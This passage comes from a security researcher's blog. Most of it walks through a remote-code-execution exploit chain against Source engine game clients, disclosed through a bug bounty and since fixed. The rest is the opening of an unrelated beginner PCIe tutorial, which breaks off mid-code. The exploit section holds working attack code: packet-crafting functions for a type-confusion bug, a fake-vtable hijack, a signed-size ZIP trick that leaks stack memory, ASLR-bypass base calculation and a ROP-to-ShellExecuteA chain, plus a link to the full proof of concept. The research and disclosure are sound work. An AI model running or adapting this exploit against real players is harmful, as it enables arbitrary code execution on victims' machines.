	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.
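To make the pointer hops in this chain concrete, here is a toy model of the three dereferences using a dictionary as 32-bit memory. It reflects my reading of the chain described above. The heap address of the string data and the address of tickcount are hypothetical values chosen only for illustration; only the vtable index and the 0x41414141 marker come from the text.

```python
POINTER_SIZE = 4   # 32-bit client process
VTABLE_INDEX = 6   # call dword ptr [eax+24] -> 24 / 4

# Hypothetical addresses, for illustration only.
SLOT_ADDR = 0x10C6B7A4         # &m_pszString, read as an out-of-bounds entity slot
STRING_DATA_ADDR = 0x0A000000  # hypothetical buffer that m_pszString points to
TICKCOUNT_ADDR = 0x20001000    # hypothetical location of the tickcount global


def build_memory(call_target: int) -> dict:
    """Lay out the fake object the way the server-controlled values would."""
    return {
        # The entity list lookup reads this slot and returns it as pEnt.
        SLOT_ADDR: STRING_DATA_ADDR,
        # First DWORD of the replicated string: the fake vtable pointer.
        STRING_DATA_ADDR: TICKCOUNT_ADDR - VTABLE_INDEX * POINTER_SIZE,
        # The value written through NET_Tick: the "function" to call.
        TICKCOUNT_ADDR: call_target,
    }


def resolve_virtual_call(memory: dict, slot_addr: int) -> int:
    """Follow the same loads the compiled virtual call performs."""
    p_ent = memory[slot_addr]      # pEnt returned by the lookup
    vtable = memory[p_ent]         # mov eax, [pEnt]
    return memory[vtable + VTABLE_INDEX * POINTER_SIZE]  # call [eax+24]


memory = build_memory(0x41414141)
print(hex(resolve_virtual_call(memory, SLOT_ADDR)))
```

Because the fake vtable pointer is tickcount minus 24, index 6 lands exactly on tickcount, so whatever the server writes there becomes the call target.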

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA)

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

Servers can cause the client to upload arbitrary files with certain file extensions
Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.
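The signed-length trick can be reproduced outside the engine. The sketch below is not the author's map-hacking script: it builds a tiny ZIP in memory, overwrites the 32-bit uncompressed size in the central directory header, and then reads it back as a signed integer the way int totalBytes would. It assumes the central directory header is the record the size is taken from, and the 16 MB limit is an illustrative stand-in for net_maxfilesize.

```python
import io
import struct
import zipfile

CENTRAL_DIR_SIG = b"PK\x01\x02"  # ZIP central directory file header signature
UNCOMPRESSED_SIZE_FIELD = 24     # byte offset of the 32-bit uncompressed size
NET_MAXFILESIZE_MB = 16          # assumption: illustrative net_maxfilesize value


def build_zip(name: str, payload: bytes) -> bytearray:
    """Create a one-file, uncompressed ZIP archive in memory."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_STORED) as archive:
        archive.writestr(name, payload)
    return bytearray(buffer.getvalue())


def patch_uncompressed_size(zip_bytes: bytearray, new_size: int) -> int:
    """Overwrite the size field of the first central directory header."""
    header = zip_bytes.find(CENTRAL_DIR_SIG)
    if header < 0:
        raise ValueError("no central directory header found")
    struct.pack_into("<I", zip_bytes, header + UNCOMPRESSED_SIZE_FIELD, new_size)
    return header


def size_as_signed_int(zip_bytes: bytearray, header: int) -> int:
    """Read the same four bytes back as a signed 32-bit integer."""
    return struct.unpack_from("<i", zip_bytes, header + UNCOMPRESSED_SIZE_FIELD)[0]


def passes_size_check(total_bytes: int) -> bool:
    """Mirror the signed comparison against the upload limit."""
    return not (total_bytes >= NET_MAXFILESIZE_MB * 1024 * 1024)


pakfile = build_zip("test.txt", b"hello")
header = patch_uncompressed_size(pakfile, 0x80000000)
total_bytes = size_as_signed_int(pakfile, header)
print(total_bytes, passes_size_check(total_bytes))
```

A size with the top bit set reads back as a negative number and slips under the limit, while an honest size of the same magnitude, such as 0x7FFFFFFF, is rejected.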

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on the stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.
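The ignored return value is the heart of the leak, and the pattern is easy to model. This is a simplified simulation rather than engine code: a reusable bytearray stands in for the 0x100-byte stack buffer, an in-memory file stands in for the pakfile, and the "return address" scribbled into the buffer between reads is just the example pointer from the log later in this post.

```python
import io

CHUNK_SIZE = 0x100  # size of the temporary buffer and of each fragment


def send_fragment(file_obj: io.BytesIO, stack_buffer: bytearray) -> bytes:
    """Mimic the vulnerable pattern: read into the buffer, ignore how many
    bytes were actually read, and send the whole buffer."""
    file_obj.readinto(stack_buffer)  # return value deliberately ignored
    return bytes(stack_buffer)


# Stale contents left behind by earlier function calls.
stack_buffer = bytearray(b"\xAA" * CHUNK_SIZE)

# A "file" that really contains only 16 bytes.
real_contents = b"PK\x05\x06" + b"\x00" * 12
pakfile = io.BytesIO(real_contents)

first = send_fragment(pakfile, stack_buffer)

# Between reads, other code reuses the same stack region (simulated here).
stack_buffer[0xE4:0xE8] = (0x7AC9AB8D).to_bytes(4, "little")

second = send_fragment(pakfile, stack_buffer)  # file is at EOF: nothing is read

print(first[:4], first[16:20].hex())
print(hex(int.from_bytes(second[0xE4:0xE8], "little")))
```

The first fragment carries 16 real bytes followed by stale data, and every later fragment is made up entirely of whatever happens to be in the buffer at the time.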

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

97 27 b3 7b
0a a4 bc 7b
05 b9 00 7c
05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4), so it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}
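The selection heuristic described above (pick the DWORD whose low 16 bits match the known offset) can be sketched offline against the values from the log. The function name `find_engine_base` is hypothetical. The DWORDs and the Engine_Leak2 offset are copied from the output shown earlier, and the 64 KiB alignment test mirrors the `& 0xFFFF` check in the Frida code.

```python
from typing import Dict, Optional

ENGINE_LEAK2_OFFSET = 0x23AB8D  # offset of the known return address in engine.dll

# Tail of the leaked 0x100-byte buffer, keyed by offset within the buffer.
LEAKED_DWORDS: Dict[int, int] = {
    0xCC: 0x00AFDD68, 0xD0: 0x0A097D0C, 0xD4: 0x0A097D00, 0xD8: 0x00AB780C,
    0xDC: 0x00000004, 0xE0: 0x00AB7778, 0xE4: 0x7AC9AB8D, 0xE8: 0x00000000,
    0xEC: 0x00000080, 0xF0: 0x00AB7804, 0xF4: 0x00AFDD68, 0xF8: 0x00AB77D4,
    0xFC: 0x00000000,
}


def find_engine_base(dwords: Dict[int, int], known_offset: int) -> Optional[int]:
    """Return the first module base implied by a leaked DWORD, or None.

    A candidate is accepted only if subtracting the known offset yields a
    positive, 64 KiB-aligned address, which is how Windows places modules.
    """
    for _position, value in sorted(dwords.items()):
        candidate = value - known_offset
        if candidate > 0 and (candidate & 0xFFFF) == 0:
            return candidate
    return None


base = find_engine_base(LEAKED_DWORDS, ENGINE_LEAK2_OFFSET)
print(hex(base) if base is not None else "no candidate")
```

Only the value at 0xE4 survives the alignment test here, which matches the leakedBase printed in the log.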

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.
Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length
The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.
The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.
The server script builds a fake object on the target client instance by replicating a ConVar onto the client. The replicated string value begins with a fake vtable pointer, which places that pointer at a known location (inside the global ConVar). The PoC replicates this value onto sv_mumble_positionalaudio, which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.
The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.
The script again replicates a ConVar, this time sv_downloadurl, onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll, so the pointer sv_downloadurl->m_pszString is now at an attacker known location.
The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.
Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.
Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the user’s files and data.

And there you have it. This entire exploitation happens automatically: Frida injects into the dedicated server process and instruments it to perform all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

[2020-05-13] Reported to Valve through HackerOne
[2020-05-18] Bug triaged
[2021-04-28] Notification that the bugs were fixed in Beta
[2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Reversing Engineering for the Soul
A Practical Tutorial on PCIe for Total Beginners on Windows (Part 1)
14 February 2023 at 00:00

Foreword about the series

Hello! I have been speaking to some friends and coworkers lately interested in learning more about PCIe but feeling intimidated by the complexity or the lack of simple resources for beginners. I have been working with PCIe a lot lately and felt like it might be worth sharing some of my experience in the form of a blog post.

This post is intended to be utilized by those with a background with computer systems who like to get their hands dirty. It is also intended for total beginners to PCIe or someone who is aware of the general concepts but is having trouble linking the concepts together.

First things first: Do not be intimidated. There are a lot of acronyms and confusing concepts that will be made simple as you “get it”. Take things a step at a time and don’t be afraid to ask questions! (If you want to ask me questions, consider pinging me @Gbps in the #hardware channel in the Reverse Engineering Discord)

I intend to do a couple of things with this series:

Break PCIe down into what I feel is most important from the software side to learn and build a good baseline mental model for modern PC/server systems.
Show practical examples of investigating PCIe hierarchies and devices on Windows using various tools (usually WinDbg).
I will hand wave or omit some specific details intentionally to avoid confusion. Terminology here may be incorrect, even the information itself might be technically incorrect. But the purpose of this is to learn the system as a whole, not the specific details of the specification. PCIe is complex, and it is not worth getting caught up in too many details and corner-cases when building a beginner’s understanding.
Hopefully demystify this technology by relating it back to concepts you are already familiar with. PCIe did not re-invent the wheel, and you probably understand a lot more about it already than you realize by understanding technologies similar to it.

I do not intend to do the following things with this series:

Go into detail about legacy PCI or PCI-X. This technology is, in general, not important other than for historical interest.
Show you how to write a device driver for a PCIe device. This is very OS specific and is much higher level than what is going to be talked about here.
Go into detail about the link layer of PCIe. More than half of the specification is spent on this subject and contains some of the most cutting edge technology in the world for high speed data transfer. I do not deal with this side of the house, however I might in the future speak about building PCIe devices with FPGAs (which I have done before).
Help you cheat in video games with PCIe. Yes, it exists. No, I will not help. Consider playing the game normally instead.

This is not a comprehensive look into the technology or the protocol. For a truly exhaustive look, you should refer to the ever elusive PCI-SIG PCI Express Base Specification. This is the specification that all PCIe code is implemented against. Currently, as of writing, we are on version 6.0 of this specification, but anything from 3.0 onwards is perfectly relevant for modern PCIe. How you acquire this expensive specification is an exercise to the reader.

Without further ado, let’s talk about PCIe starting from square one.

NOTE: I will sometimes switch back and forth between “PCI” and “PCIe” when describing the technology as a force of habit. Everything in this series is about PCIe unless otherwise noted.

What is PCIe and why should I care?

PCIe stands for Peripheral Component Interconnect Express. It was introduced first in 2003 and evolved from the older PCI and PCI-X specifications that grew in popularity in the early PC era (with the added “e” for Express to differentiate it).

Most people who work with computers recognize it as the PCIe slot on their motherboard where they plug in graphics cards or adapter cards, but PCIe is way more than just these few extension ports. PCIe is the foundation of how a modern CPU speaks to practically every device connected to the system.

Since its introduction, PCIe’s popularity has skyrocketed as a near universal standard for short-distance high-speed data transmission. Nearly all M.2 SSDs use NVMe over PCIe as their transport protocol. Thunderbolt 3 brought the ability to dynamically hotplug PCIe devices directly to the system using an external cord (enabling technology such as docking stations and eGPUs). Building off of that, USB4 is in the process of extending Thunderbolt 3 to enable this PCIe routing technology to the open USB specification. New transports such as CXL for datacenter servers utilize PCIe as the base specification and extend their special sauce on top of it.

Even if the device being communicated with doesn’t natively use PCIe as its physical layer protocol, the system must still use PCI’s software interface to communicate. This is because the system uses adapters (often called Host Controllers) which are PCI devices that facilitate the translation from PCI requests from the CPU into whatever protocol or bus the Host Controller supports. For example, all USB 3.1 on this test machine utilizes the USB XHCI protocol, which is a communication protocol that bridges PCIe to USB through a PCI driver communicating with the USB Host Controller.

A USB 3.1 Host Controller. All USB on this system will happen through this controller, which is on the PCI bus.

Needless to say, PCI is running the show everywhere these days and has been fully adopted by all parts of the computing world. It is therefore important that we develop a good understanding of this technology to build a better understanding of modern computing.

Investigating a PCIe Hierarchy - A packet switched network

The biggest change from legacy PCI to PCIe was the change from a true bus topology to a point-to-point link. You can think of this as the evolution from Ethernet hubs to the Ethernet switches of today. Each link is a separate point-to-point link that is routed just like an Ethernet cord on a packet-switched Ethernet network. This means that PCIe is not actually a “bus protocol”, despite the word “bus” confusingly used all over the literature and technical specifications. One must carefully learn that this word “bus” does not mean multiple PCIe devices are talking on the same physical link. Packets (known as TLPs) travel across each individual link and the switching devices in the hierarchy deliver the packet to the proper ports using routing information within the packet.

Before we go into the technical details of PCIe, first we need to talk about how the whole system is laid out. The first way we will be investigating the hierarchy of PCIe is through the Windows Device Manager. Most people who are familiar with Windows have used it before, but not many people know about the very handy feature found in View > Devices by Connection.

By selecting this view, we get to see the full topology of the system from the root PNP (Plug-N-Play) node. The PNP root node is the root of the tree of all devices on Windows, regardless of what bus or protocol they use. Every device, whether virtual or physical, is enumerated and placed onto this PNP tree. We can view the layout of this tree utilizing this view of the Device Manager.

In particular, we are looking to find the layout of the PCI devices on the system. That way, we can begin to build a visual model of what the PCI tree looks like on this machine. To do that, we need to locate the root of the PCI tree: the Root Complex. The Root Complex (abbreviated RC) is the owner of all things PCIe on the system. It is located physically on the CPU silicon and it is responsible for acting as the host that all PCIe devices receive and send packets with. It can be thought of as the bridge between software (the instructions executing on your machine) and hardware (the outside world of PCIe and RAM).

On this system, it is found in the PNP hierarchy here:

NOTE: You might be asking now “if PCI runs the show, why isn’t the PCI Root Complex at the top of the tree?” The answer to that is due to the fact that the PCIe bus is not the initial layout of the system presented by firmware during boot. Instead, ACPI (Advanced Configuration & Power Interface) is what describes the existence of PCIe to the OS. While you would never see it in a PC, it is possible to describe a system with no PCI bus and everything being presented purely by ACPI. We will talk more about ACPI later, but for now do not worry about this too much, just know that ACPI is how firmware tells us where the Root Complex is located, which then helps the OS enumerate PCI devices in the tree.

So now that we know the Root Complex is the top of the PCIe tree, let’s take a look at what is underneath it:

Unsurprisingly, there are many devices on this PCI bus. Here we can see all sorts of controllers responsible for Audio, Integrated Graphics, USB, Serial, and SATA. In addition, we see a few devices named PCI Express Root Port. A Root Port is a port on the Root Complex where another PCIe Endpoint (aka a physical ‘device’) or Switch (aka a ‘router’) can be connected. In PCI specification terms, you will hear Endpoints referred to as Type 0 devices and Switches (or Bridges) referred to as Type 1 devices, because one is configured as a device to talk to and the other is configured as a device to route packets. An RC will have as many root ports as it physically supports, that is, as many as can be connected to the CPU silicon. Some root ports on a CPU might be routed directly to a physical PCIe slot, while others might be routed to other types of slots like an NVMe slot. A root port might also be routed to another PCIe switching device, which can route packets to multiple ports and therefore multiple Endpoints at once.

I will keep bringing this comparison back up, but I feel it is important– if you already understand Ethernet switches, you already understand PCIe switches. You can imagine that these root ports are like Ethernet ports on your desktop computer. You could connect these directly to another device (such as a camera) or you could connect these to a switch like your home router/modem, which will switch packets to expose more connections with further devices and machines to talk to. In this case, the ethernet cords are instead copper wire connecting one PCIe port to another PCIe port, thereby making it “point-to-point”.

With this in mind, let’s start diagramming this hierarchy (partially) so we’re seeing it all laid out visually:

In PCI, all “busses” on the system are identified with a number from 0 to 255 (inclusive). In addition, all devices are identified with a “device id” and a “function id”. This is often seen described as Bus/Device/Function, or simply BDF. In more correct specification terms, this would be known as a RID (Requester ID). To reduce confusion, I will refer to it as a BDF. BDF is important because it specifically tells us where in the PCIe hierarchy the device is located so we can communicate with it.
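
To make the BDF a bit more concrete, here is a minimal sketch of how the three numbers pack into a single 16-bit value. It assumes the standard layout of 8 bits of bus, 5 bits of device, and 3 bits of function; the helper names are made up for illustration and do not come from any real tool.

```python
def pack_bdf(bus: int, device: int, function: int) -> int:
    """Pack Bus/Device/Function into one 16-bit value (8 + 5 + 3 bits)."""
    if not (0 <= bus <= 0xFF and 0 <= device <= 0x1F and 0 <= function <= 0x7):
        raise ValueError("bus must be 0-255, device 0-31, function 0-7")
    return (bus << 8) | (device << 3) | function


def unpack_bdf(rid: int) -> tuple:
    """Split a 16-bit value back into (bus, device, function)."""
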